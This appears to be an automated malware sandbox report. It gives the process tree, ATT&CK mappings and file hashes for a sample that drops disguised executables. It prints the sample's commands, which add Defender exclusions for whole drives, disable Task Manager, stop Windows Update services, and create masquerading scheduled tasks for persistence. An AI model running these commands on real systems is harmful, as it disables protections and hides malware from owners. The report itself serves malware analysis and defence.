PID 2644 wrote to memory of 2412	2644	ServerComponenthostMonitorDll.exe	71
PID 2644 wrote to memory of 2412	2644	ServerComponenthostMonitorDll.exe	71
PID 2644 wrote to memory of 2412	2644	ServerComponenthostMonitorDll.exe	71
PID 2644 wrote to memory of 1108	2644	ServerComponenthostMonitorDll.exe	73
PID 2644 wrote to memory of 1108	2644	ServerComponenthostMonitorDll.exe	73
PID 2644 wrote to memory of 1108	2644	ServerComponenthostMonitorDll.exe	73
PID 2644 wrote to memory of 1312	2644	ServerComponenthostMonitorDll.exe	74

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:608
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    - Drops desktop.ini file(s)
    PID:1440
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:2976
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:684
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:756
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:828
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1180
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {537A15BC-7439-42DE-9664-B57CFC43A4C7} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:2716
  - - C:\Program Files\Google\Chrome\updater.exe
      "C:\Program Files\Google\Chrome\updater.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      PID:1516
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {C78BE0D0-C88F-406F-8AC5-0264D7412765} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
    3⤵
    PID:2108
  - - C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe
      "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"
      4⤵
      Executes dropped EXE
      PID:2812
  - - C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe
      "C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe"
      4⤵
      Executes dropped EXE
      PID:3032
  - - C:\Users\All Users\Microsoft Help\Idle.exe
      "C:\Users\All Users\Microsoft Help\Idle.exe"
      4⤵
      Executes dropped EXE
      PID:1416
  - - C:\containerperf\ServerComponenthostMonitorDll.exe
      C:\containerperf\ServerComponenthostMonitorDll.exe
      4⤵
      Executes dropped EXE
      PID:2040
  - - C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe
      "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe"
      4⤵
      Executes dropped EXE
      PID:2340
  - - C:\Program Files\Windows NT\Accessories\audiodg.exe
      "C:\Program Files\Windows NT\Accessories\audiodg.exe"
      4⤵
      Executes dropped EXE
      PID:2256
  - - C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe
      "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"
      4⤵
      Executes dropped EXE
      PID:860
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:980
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:272
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:308
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1080
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1116
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:624
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1852
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2752

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:488

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:496

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1244
- C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
  C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2580
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2632
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2644
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2kow1az\n2kow1az.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:1332
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES44DD.tmp" "c:\Windows\System32\CSC9175271B41B14A2EA1B778189E3E6F6.TMP"
        8⤵
        
        PID:1944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\audiodg.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft Help\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\30syf9EvfD.bat"
        7⤵
        
        PID:3000
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1984
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:376
        
        C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe
        
        "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:912
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2724
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:600
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1520
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2312
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1936
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2792
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2840
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2064
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1760
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1308
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1740
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2396
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:588
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1028
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1744
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2220
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1936
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:860
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:1664
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2224
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2972
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 14 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 13 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "109332762620666391368641376161594601744710438679-1606020817-181360311-1621960699"
1⤵
PID:1416

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-64050529-13265826311135633568-1565710164625305720-1982950223-541205645-2142089886"
1⤵
PID:2068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1426144456-1194045333-1788322024-972468406-7718692011143336297-650040848947488710"
1⤵
PID:1892

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1171289986-19094382092094122751910601896-3460244319023325331249566449-51990826"
1⤵
PID:2836

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-99330723816306743851229039494606657611925776152-421118530-591098480-2054745108"
1⤵
PID:2876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13444458631175246456952563544634276568-63721837-194355836518828974571459342841"
1⤵
PID:2388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-998118779-40381249864574749-2021583664-1690669742667890986-69411019639220884"
1⤵
PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\30syf9EvfD.bat

Filesize
259B

MD5
f93227cd9ba821bb49011e55c0dbdf03

SHA1
4ff46d553c7bc5c3d550fb81560d68615e5e08c2

SHA256
5bde4537d4b2810ef7f668913b5378e8e1a3c371f082a9fb1095935e7804d7e5

SHA512
2bcbc5500a90e886207511ec6169dfe48903eafcba5a348ea1017ebd89b5b2106d1bb75c9835b53441a076c7d36ee29a98aa7264f073f37cf37f989927fe900a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES44DD.tmp

Filesize
1KB

MD5
782a8a45bf311033b3a7b1b0f33482c6

SHA1
